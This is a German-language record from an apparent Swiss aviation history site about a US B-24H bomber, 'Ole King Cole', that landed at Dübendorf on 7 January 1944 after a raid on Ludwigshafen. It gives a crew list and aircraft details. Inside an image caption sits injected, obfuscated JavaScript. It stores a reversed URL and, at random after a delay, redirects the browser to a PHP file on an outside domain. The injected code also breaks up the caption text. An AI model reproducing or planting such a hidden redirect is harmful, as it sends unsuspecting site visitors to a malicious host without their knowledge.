Ereignisse

Defekte Turbolader

Der Bomber mit dem Kennzeichen D ist nach einem Einsatz über Ludwigshafen in Dübendorf gelandet. Am 08.10.1945 nach Burtonwood zurückgekehrt.

Der Bomber nach der L<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andung in Dübendorf. (125_1)“ width=“800″ height=“282″ /> Der Bomber nach der Landung in Dübendorf. (125_1)

Am 7. Januar 1944 musste 1Lt David M. Richardson seine B-24H-2-FO 42-7519 nach einem Angriff auf die Chemiewerke von Ludwigshafen nach Dübendorf steuern, nachdem die Turbolader auf drei Triebwerken ihren Dienst quittiert hatten. Der Bomber der 8th Air Force, 93rd Bomb Group mit dem Kennzeichen D und dem Übernamen „Ole King Cole“ ist am 08.10.1945 nach Burtonwood zurückgekehrt.


Ereignissdatum 7.1.1944
Ort Dübendorf
Kanton ZH
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-24 Liberator
Flugzeugbezeichnung B-24 H-2-FO
Einteilung 8th Air Force, 93rd bomb Group, 328 Squadron
Basis Hardwick (GB)
Auftrag Bombardierung
Einsatzziel Chemiewerke Ludwigshafen (D)
Rückkehr 08.10.1945 nach Burtonwood (GB)
Werknummer 42-7519
Kennzeichen D
CH Archiv Nr. A012
US MACR Nr. 2367
Besatzung Pilot: David M. Richardson, 1st Lt
Copilot: Langdon S. Simons, Jr., 2nd Lt
Navigator: Peter Zarafonatis, 2nd Lt
Bombardier, William V. Love, 2nd Lt
Engineer: Willis E. Million, T/Sgt
Radio: Louis M. Martinez, Jr., T/Sgt
Ball Turret: Donald N. Chase, S/Sgt
Right Waist: Bruno A. Cercone, S/Sgt
Left Waist: Hubert P. Schaller, S/Sgt
Tail Gunner: William R. DeLozier, S/Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer